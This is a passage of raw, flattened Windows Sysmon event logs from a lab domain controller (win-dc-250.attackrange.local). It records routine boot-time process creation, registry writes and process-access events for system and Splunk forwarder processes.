CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{08A6967A-4286-6000-0400-000000009A01}628C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c 10341000x8000000000000000699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:25.994{08A6967A-4284-6000-0200-000000009A01}452460C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}628C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:25.994{08A6967A-4284-6000-0200-000000009A01}452460C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}628C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.002{08A6967A-4286-6000-0400-000000009A01}628C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c C:\Windows\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{08A6967A-4284-6000-0200-000000009A01}452C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x8000000000000000696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.729{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Leave)Binary Data 10341000x8000000000000000695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:24.729{08A6967A-4284-6000-0200-000000009A01}452456C:\Windows\System32\smss.exe{08A6967A-4284-6000-0300-000000009A01}584C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:24.724{08A6967A-4284-6000-0300-000000009A01}584C:\Windows\System32\autochk.exe10.0.14393.4046 (rs1_release.201028-1803)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=4DEB2ED5AD84897181481B7567B3A90D,SHA256=85C6FF209D7BD3EF690F0AC7EEF0FE0CB66D26090887E9ADB1E63C8EEF5E2C7B,IMPHASH=5F30E54B15CF4B4A5C756AEF16C9668F{08A6967A-4284-6000-0200-000000009A01}452C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x8000000000000000693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Enter)Binary Data 13241300x8000000000000000684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.713{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\XEN\Unplug\NICSDWORD (0x00000001) 13241300x8000000000000000683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-01-14 13:09:24.697{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Enum\XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0\FriendlyNameAWS PV Network Device #0 13241300x8000000000000000682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.697{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMinorVersionDWORD (0x00000002) 13241300x8000000000000000681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.697{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMajorVersionDWORD (0x00000008) 13241300x8000000000000000680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.697{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMinorVersionDWORD (0x00000001) 13241300x8000000000000000679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.697{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.682{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.682{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\CountDWORD (0x00000001) 13241300x8000000000000000676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.682{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\0XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0 13241300x8000000000000000675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.682{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xenvif\Addresses\002:8d:61:1a:40:24 13241300x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.666{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.666{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.666{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.666{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.557{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Parameters\WppRecorder_TraceGuid{09281f1f-f66e-485a-99a2-91638f782c49} 13241300x8000000000000000669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.541{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\i8042prt\Parameters\WppRecorder_TraceGuid{7ffb8eb8-2c86-45d6-a7c5-c023d9c070c1} 13241300x8000000000000000668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.494{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.494{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.494{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMajorVersionDWORD (0x00000001) 13241300x8000000000000000663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMinorVersionDWORD (0x00000028) 13241300x8000000000000000658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMajorVersionDWORD (0x00000006) 10341000x80000000000000002030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429A-6000-5100-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429A-6000-5100-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.931{08A6967A-429A-6000-4F00-000000009A01}38802220C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-429A-6000-5100-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.940{08A6967A-429A-6000-5100-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.900{08A6967A-429A-6000-5000-000000009A01}40604056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 